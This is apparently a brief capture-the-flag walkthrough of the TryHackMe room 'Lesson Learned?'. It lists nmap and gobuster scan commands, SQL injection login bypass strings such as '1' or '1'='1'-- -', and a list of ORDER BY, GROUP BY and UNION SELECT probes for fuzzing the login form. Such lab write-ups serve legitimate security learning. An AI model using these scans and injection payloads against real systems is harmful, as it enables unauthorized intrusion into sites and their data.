Lesson Learned?

Room Link: https://tryhackme.com/room/lessonlearned

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Browser

Username: 1' or '1'='1'-- -
Password: 1' or '1'='1'-- -

Option #1

Used this page to collect possible injections

Page not found - HackTricksbook.hacktricks.xyz

List

1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -

Add list above as payload in position 1 and 2

Browser

Username: 1' UNION SELECT null-- -
Password: 1' GROUP BY 2--+

Previousb3dr0ck NextOpacity

Last updated 1 year ago